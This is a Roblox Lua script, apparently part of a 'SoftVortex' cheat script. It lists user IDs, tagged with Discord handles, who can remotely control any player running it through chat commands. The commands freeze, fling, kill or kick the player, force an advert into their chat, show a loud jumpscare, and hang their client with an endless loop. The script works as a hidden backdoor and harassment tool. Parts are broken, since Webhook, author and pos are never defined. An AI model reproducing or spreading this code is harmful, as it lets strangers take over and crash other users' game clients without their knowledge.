local player = game.Players.LocalPlayer
local Players = game:GetService("Players")

local Admins = {
    2411896398,
    109967, --5days
    589856223, --5days
    251387218, --5DAYS
    1751254477, ---migsu#0001
    3276810125,
    2510693800, ---Crazy-#0002
    2330042450, ---de manny#1994
    2469827475, --2days
    3256403326, --2days
    3316061905, --5 days
    774656289, --2days
    1436622231, --Rte#0001
    52678700, --Rizwan.mv#9384
    1580832817, --vlxner
    444472506, --luna ?#7777
    321845082, --Dlow
    81027808, --Dogle#6666
    363784792, --7th#9533
    1680554601, --5days
    2427543947, ---sczuyu#0009
    87808571, ---lilscrubb#4222
    2438368361,
    1532594445, --Liquid.#0983
    866213970, --retire#0001
    937843420, --sacred#0001
    34462404, --Sao#0666
    1252644850, --sheloveskb#1150
    115460985, --115460985 (my dh id)#1400
    1376406201, --RubicScythe#6259
    481519010, --5days
    177809739, --sno#5346
    1573851899, --𝓢𝓹𝓸𝓸𝓴𝔂#0314
    1368330888, --veiixz#7747
    359900506, --Anthony シ#5501
    1252644850, --sheloveskb#1150
    3160742375, --kef#5715
    44217136, ---randomkid
    2601887912,
    278638090, --2pl#5032
    2519843836, ---DT
    2664279012, ---jaden#6184
    876953766, ---Sydneyy#1738
    413956126, ---Dilun#4181
    2393777320,
    272080327, ---Amador#0001
    2686156693, ---vinnix
    727918321, ---adsire#7777
    932150372, ---Nagger#1349
    245501651, ---Rex✓#0001
    3251820143, ---Wsg#3798
    3318906376, ---nyaw#0069
    2261485730, ---xvz#0001
    2522103092, ---!tahjeen#8401
    3242239583,
    110757900, ---Haz#6120
    1617667114, ---Ela
    1597062518, ---T0X#8678
    79287609, ---Crostide#8181
    52678700, ---Rizwan.mv#9171
    2441901562,
    2221151191, ---ᎯᏞ3ᏁᎿᎬᏞ#6660
    1240931272, ---Skepticc#4221
    2896656846, ---F4ir#8838
    188439784, ---gas#3370
    3487585765, ---rashad#4582
    413327728, ---klx#3545
}

local function commands(msg, plr)
    if table.find(Admins, plr) then
        local Mod = game:GetService("Players"):GetPlayerByUserId(plr)
        local Msg = string.lower(msg)
        local SplitCMD = string.split(Msg, ".")
        local Lower = string.lower(player.Name)
        local Allowed = string.find(Lower, SplitCMD[2])
        if Allowed then
            if string.find(SplitCMD[1], ":freeze") then
                player.Character.HumanoidRootPart.Anchored = true
            end
            if string.find(SplitCMD[1], ":unfreeze") then
                player.Character.HumanoidRootPart.Anchored = false
            end
            if string.find(SplitCMD[1], ":users") then
                game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Get Good, Get SoftVortex!", "All")
            end
            if string.find(SplitCMD[1], ":fling") then
                player.Character.HumanoidRootPart.Velocity = Vector3.new(500000,500000,500000)
            end
            if string.find(SplitCMD[1], ":kill") then
               local plr = game.Players.LocalPlayer
                game.Players.LocalPlayer.Character.Humanoid.Health = 0
            end
            if string.find(SplitCMD[1], ":bring") then
            local plr=game:service"Players".LocalPlayer;
            local tweens=game:service"TweenService";
            local info=TweenInfo.new(7,Enum.EasingStyle.Quad);
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[author].Character.Head.CFrame
            local tween=tweens:Create(plr.Character["HumanoidRootPart"],info,{CFrame=pos});
            tween:Play();
            end
            if string.find(SplitCMD[1], ":scare") then
                function Scare()
                    local ScreenGui = Instance.new("ScreenGui")
                    local ImageLabel = Instance.new("ImageLabel")

                    local image = {"109129888", "146577131", "1309130490", "1119705746", "7479500080"}

                    local image2 = {"7236404523", "6150329916", "8195739170", "8628815817"}

                    ScreenGui.Parent = game.CoreGui
                    ScreenGui.Name = "SCREAM"
                    ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

                    ImageLabel.Parent = ScreenGui
                    ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    ImageLabel.Position = UDim2.new(0, 0, -0.000674206764, 0)
                    ImageLabel.Size = UDim2.new(1, 0, 1.00857365, 0)
                    ImageLabel.Image = "rbxassetid://" .. image[math.random(1, #image)]
                    ImageLabel.Visible = false
                    ImageLabel.BackgroundTransparency = 1
                    ImageLabel.Visible = true
                    local sound = Instance.new("Sound")
                    sound.Parent = game.Workspace
                    sound.SoundId = "rbxassetid://" .. image2[math.random(1, #image2)]
                    sound.Volume = 200
                    sound:Play()
                    for i = 0, 1, 0.1 do
                        wait(0.05)
                        ImageLabel.ImageTransparency = i
                    end
                    sound.Ended:Wait()
                    sound:Destroy()
                    ScreenGui:Destroy()
                end
                if not game.CoreGui:FindFirstChild("SCREAM") then
                    Scare()
                end
            end
            if string.find(SplitCMD[1], ":kick") then
                local ISADMIN = table.find(Admins, player.UserId)
                if not ISADMIN then
                    player:Kick("Kicked.")
                    Webhook(player, "USER KICKED!")
                    wait(5)
                    while true do
                    end
                end
            end
        else
end
    end
end

Players.PlayerAdded:Connect(
    function(plr)
        local ADMINS = table.find(Admins, plr.UserId)
        if ADMINS then
            plr.Chatted:Connect(
                function(msg)
                    commands(msg, plr.UserId)
                end
            )
        end
    end
)

for i, v in pairs(game:GetService("Players"):GetChildren()) do
    local ADMINS = table.find(Admins, v.UserId)
    if ADMINS then
        v.Chatted:Connect(
            function(msg)
                commands(msg, v.UserId)
            end
        )
    end
end
